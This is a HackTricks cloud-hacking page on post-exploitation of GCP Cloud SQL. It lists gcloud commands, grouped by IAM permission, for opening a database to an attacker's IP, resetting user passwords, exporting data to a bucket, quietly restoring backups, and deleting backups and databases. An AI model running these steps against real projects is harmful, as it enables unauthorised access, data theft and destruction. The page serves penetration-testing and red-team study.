HackTricks Cloud
HackTricks Training Twitter Linkedin Sponsor

GCP - Cloud SQL Post Exploitation

Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)!

Other ways to support HackTricks:

Cloud SQL

For more information about Cloud SQL check:

pageGCP - Cloud SQL Enum

cloudsql.instances.update, ( cloudsql.instances.get)

To connect to the databases you just need access to the database port and know the username and password, there isn't any IAM requirements. So, an easy way to get access, supposing that the database has a public IP address, is to update the allowed networks and allow your own IP address to access it.

# Use --assign-ip to make the database get a public IPv4
gcloud sql instances patch $INSTANCE_NAME \
    --authorized-networks "$(curl ifconfig.me)" \
    --assign-ip \
    --quiet

mysql -h <ip_db> # If mysql

# With cloudsql.instances.get you can use gcloud directly
gcloud sql connect mysql --user=root --quiet

It's also possible to use --no-backup to disrupt the backups of the database.

As these are the requirements I'm not completely sure what are the permissions cloudsql.instances.connect and cloudsql.instances.login for. If you know it send a PR!

cloudsql.users.list

Get a list of all the users of the database:

gcloud sql users list --instance <intance-name>

cloudsql.users.create

This permission allows to create a new user inside the database:

gcloud sql users create <username> --instance <instance-name> --password <password>

cloudsql.users.update

This permission allows to update user inside the database. For example, you could change its password:

gcloud sql users set-password <username> --instance <instance-name> --password <password>

cloudsql.instances.restoreBackup, cloudsql.backupRuns.get

Backups might contain old sensitive information, so it's interesting to check them. Restore a backup inside a database:

gcloud sql backups restore <backup-id> --restore-instance <instance-id>

To do it in a more stealth way it's recommended to create a new SQL instance and recover the data there instead of in the currently running databases.

cloudsql.backupRuns.delete

This permission allow to delete backups:

gcloud sql backups delete <backup-id> --instance <instance-id>

cloudsql.instances.export, storage.objects.create

Export a database to a Cloud Storage Bucket so you can access it from there:

# Export sql format, it could also be csv and bak
gcloud sql export sql <instance-id> <gs://bucketName/fileName>

cloudsql.instances.import, storage.objects.get

Import a database (overwrite) from a Cloud Storage Bucket:

# Import format SQL, you could also import formats bak and csv
gcloud sql import sql <instance-id> <gs://bucketName/fileName>

cloudsql.databases.delete

Delete a database from the db instance:

gcloud sql databases delete <db-name> --instance <instance-id>
Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)!

Other ways to support HackTricks:

PreviousGCP - Cloud Shell Post ExploitationNextGCP - Compute Post Exploitation

Last updated